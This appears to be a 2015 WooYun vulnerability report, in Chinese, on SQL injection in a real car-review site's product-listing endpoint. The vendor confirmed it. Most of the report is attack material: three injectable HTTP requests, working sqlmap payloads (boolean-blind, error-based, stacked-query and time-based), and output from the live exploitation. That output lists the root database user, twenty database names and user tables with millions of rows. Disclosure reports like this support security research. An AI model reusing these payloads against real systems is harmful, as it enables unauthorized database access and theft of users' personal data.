当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122555

漏洞标题:汽车点评某站点存在SQL注入影响大量数据之三顾茅庐

相关厂商:xgo.com.cn

漏洞作者: 路人甲

提交时间:2015-06-24 22:10

修复时间:2015-08-09 10:30

公开时间:2015-08-09 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

233

详细说明:

一顾茅庐:
GET /index.php?brand_id=342&page=1&pro_shoe_flat=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
二顾茅庐:
GET /index.php?brand_id=342&page=1&pro_shoe_size=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
三顾茅庐:
GET /index.php?brand_id=342&page=1&pro_shoe_width=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

漏洞证明:

---
Parameter: pro_shoe_size (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: brand_id=342&page=1&pro_shoe_size=-8646') OR 1145=1145 AND ('qSaI'='qSaI&r=product/shoe
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: brand_id=342&page=1&pro_shoe_size=1') AND (SELECT 3333 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(3333=3333,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('axIY'='axIY&r=product/shoe
Type: stacked queries
Title: MySQL < 5.0.12 stacked queries (heavy query - comment)
Payload: brand_id=342&page=1&pro_shoe_size=1');SELECT BENCHMARK(5000000,MD5(0x4b6a7464))#&r=product/shoe
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: brand_id=342&page=1&pro_shoe_size=1') OR SLEEP(5) AND ('CxzS'='CxzS&r=product/shoe
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'root@192.168.50.35'
available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu
Database: xgo_user
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| user_relations | 6387728 |
| userinfo | 1707478 |
| user_active_log | 1595044 |
| user_checkimg | 921394 |
| user_album_pic | 876639 |
| user_check_mobile_code | 875492 |
| user_message_2011 | 413961 |
| user_message_2014 | 394551 |
| user_online | 321710 |
| user_real | 309146 |
| user_extend | 309134 |
| user_mail_set | 309052 |
| user_message_2013 | 255437 |
| user_album_info | 230297 |
| user_score | 207002 |
| user_message | 167525 |
| user_register_log | 163113 |
| user_message_2012 | 156266 |
| user_oltime_2011 | 125514 |
| user_oltime_2013 | 125226 |
| userinfo_test | 123526 |
| userinfo_new | 111228 |
| user_visitor | 100592 |
| user_oltime_2012 | 93920 |
| user_oltime_2014 | 88678 |
| user_check_mail_code | 62122 |
| user_oltime_2015 | 55335 |
| x_invite_code | 39950 |
| z_login_api | 35261 |
| z_api_token | 16330 |
| tag_from_pic | 5881 |
| tag_from_user | 5881 |
| x_log_login_2013 | 4974 |
| x_user_score | 4950 |
| x_userinfo_extend | 4950 |
| audit_log | 4824 |
| x_check_mail_code | 4612 |
| user_car_list_product_rel | 4493 |
| user_comments | 3538 |
| x_log_send_mail_2013 | 3012 |
| user_tag2 | 2717 |
| x_register_history | 2608 |
| user_album_pic_tags | 2538 |
| china_city | 2489 |
| user_carport | 2352 |
| x_user_car | 1397 |
| x_log_login_2015 | 1200 |
| user_book_collection | 1132 |
| x_log_login_2014 | 1101 |
| user_interest_doc0 | 1080 |
| x_log_send_mail_2014 | 1080 |
| whitelistuser | 1043 |
| x_log_modify_pwd_2013 | 989 |
| user_obj_comments | 974 |
| x_check_mobile_code | 947 |
| tag | 890 |
| user_car_list | 814 |
| user_tag_num | 768 |
| x_register | 751 |
| x_log_send_mail_2015 | 613 |
| checkimg_group | 601 |
| china_town | 580 |
| gift_present | 425 |
| tag_user1 | 382 |
| tag_user8 | 351 |
| tag_user9 | 342 |
| x_oauth_bind | 337 |
| user_owner_info | 336 |
| tag_user7 | 330 |
| tag_user3 | 316 |
| user_hide | 312 |
| x_log_modify_pwd_2014 | 292 |
| tag_user5 | 287 |
| z_login_api_bark | 279 |
| tag_user6 | 274 |
| tag_user4 | 239 |
| gift_buy | 235 |
| tag_user2 | 227 |
| user_interest_doc17 | 144 |
| x_log_modify_pwd_2015 | 132 |
| user_car_list_vote_1 | 87 |
| china_province | 35 |
| gift | 32 |
| user_tag1 | 31 |
| user_active_cate | 30 |
| xgo_qq_session | 21 |
| user_rank | 9 |
| gift_sort | 6 |
| user_modify_pw_log | 5 |
| user_interest_doc18 | 2 |
| x_user_verify | 2 |
+---------------------------+---------+

修复方案:

这个影响看看,凭良心。
求 20 rank!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-25 10:28

厂商回复:

感谢,已经在修复

最新状态:

暂无